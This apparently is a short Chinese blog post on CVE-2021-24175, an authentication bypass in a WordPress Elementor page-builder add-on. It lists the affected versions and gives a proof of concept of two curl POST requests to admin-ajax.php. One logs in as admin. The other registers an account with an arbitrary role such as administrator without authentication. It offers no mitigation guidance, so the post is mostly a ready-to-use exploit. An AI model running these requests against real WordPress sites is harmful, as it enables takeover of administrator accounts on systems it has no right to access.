CVE-2021-24175_WordPress_Elementor_Page_Builder_Plus插件身份驗證繞過漏洞

# CVE-2021-24175 WordPress Elementor Page Builder Plus插件身份驗證繞過漏洞
==影響版本==
Elementor Page Builder <4.1.7 ==POC==

curl -X POST –data action=theplus_ajax_login –data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
curl -X POST –data action=theplus_google_ajax_register –data email=admin –data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php

“theplus_google_ajax_register” AJAX請求還可以允許任何未經身份驗證的用戶創建具有任意角色的帳戶,例如admin,然後登錄。

html:

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容